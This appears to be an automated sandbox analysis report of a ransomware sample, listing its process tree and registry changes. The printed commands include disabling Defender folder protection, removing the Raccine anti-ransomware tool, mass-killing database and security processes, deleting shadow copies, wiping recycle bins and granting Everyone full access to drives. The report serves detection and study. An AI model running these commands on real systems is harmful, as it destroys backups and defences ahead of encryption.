PID 280 wrote to memory of 1816	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	netsh.exe
PID 280 wrote to memory of 1816	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	netsh.exe
PID 280 wrote to memory of 1088	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 1088	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 1088	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 916	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 916	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 916	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 1692	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!"	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!\r\n\r\n\r\n(с) Каждый человек — программист собственного счастья и хакер чужого."	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
1⤵
- Modifies extensions of user files
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:280
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1784
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:328
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1620
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1480
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1760
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1572
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:944
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:900
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1732
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1684
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1084
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:428
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1772
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:1092
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1524
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1072
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1144
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1816
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1088
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:916
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:1692
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:1616
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:428
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:576
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:852
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:1944
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:1608
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1496
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1084
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:964
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1592
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:980
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1188
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:1300
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:1976
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:276
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1640
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1576
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1776
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:944
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:976
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1760
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:1972
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1680
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:328
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:480
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:580
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:900
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1988
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1000
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1404
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:1772
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1796
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1844
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:1804
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:920
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:532
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1660
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1812
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1616
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:852
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1816
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:480
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1692
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1728
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:984
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:576
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1776
- C:\Windows\system32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:1084
- C:\Windows\system32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:300
- C:\Windows\system32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:408
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3092.bat
  2⤵
  PID:1496
- - C:\Windows\system32\mountvol.exe
    mountvol
    3⤵
    PID:1144
- - C:\Windows\system32\find.exe
    find "}\"
    3⤵
    PID:1576
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{de9ebae3-989d-11eb-b4e6-806e6f6e6963}\
    3⤵
    PID:1804
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:980
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{de9ebae4-989d-11eb-b4e6-806e6f6e6963}\
    3⤵
    PID:1592
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:1796
- - C:\Windows\system32\mountvol.exe
    mountvol !freedrive!: \\?\Volume{de9ebae7-989d-11eb-b4e6-806e6f6e6963}\
    3⤵
    PID:900
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:1580
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1596
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:1816
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1692
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:1092
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-2455352368-1077083310-2879168483-1000\d5019152-81c9-4e4b-b0f5-80b37542e450 /grant Everyone:F /T /C /Q
  2⤵
  PID:1144
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000001 /grant Everyone:F /T /C /Q
  2⤵
  PID:1808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ConnectCompare.mov /grant Everyone:F /T /C /Q
  2⤵
  PID:1680
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2455352368-1077083310-2879168483-1000\0f5007522459c86e95ffcc62f32308f1_14c10c19-3a0b-4ef0-8928-af871cb14c00 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1988
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1620
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
  2⤵
  PID:1920
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:984
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1308
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1836
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:1640
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:828
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Videos\Sample Videos\Wildlife.wmv /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv /grant Everyone:F /T /C /Q
  2⤵
  PID:380
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1860
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Desert.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1756
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1960
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Koala.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:964
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1660
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1500
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1632
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Kalimba.mp3 /grant Everyone:F /T /C /Q
  2⤵
  PID:1588
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 /grant Everyone:F /T /C /Q
  2⤵
  PID:2012
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Music\Sample Music\Sleep Away.mp3 /grant Everyone:F /T /C /Q
  2⤵
  PID:480
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:1708
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:1092
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1576
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:980
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:984
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:276
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:1640
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1368
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1728
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft Help\nslist.hxl /grant Everyone:F /T /C /Q
  2⤵
  PID:596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:1756
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:1484
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1584
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:156
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1632
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-07132009-221054.log /grant Everyone:F /T /C /Q
  2⤵
  PID:1864
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasbase.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:1784
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasdlta.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:1664
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_15ac16619585aa27282df5e4c6acd0916524a313_cab_07747e05\DMI7DF5.tmp.log.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1976
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:1836
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:1556
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1580
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1144
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:1844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:980
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:1728
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1940
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:1660
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1500
- C:\Windows\system32\icacls.exe
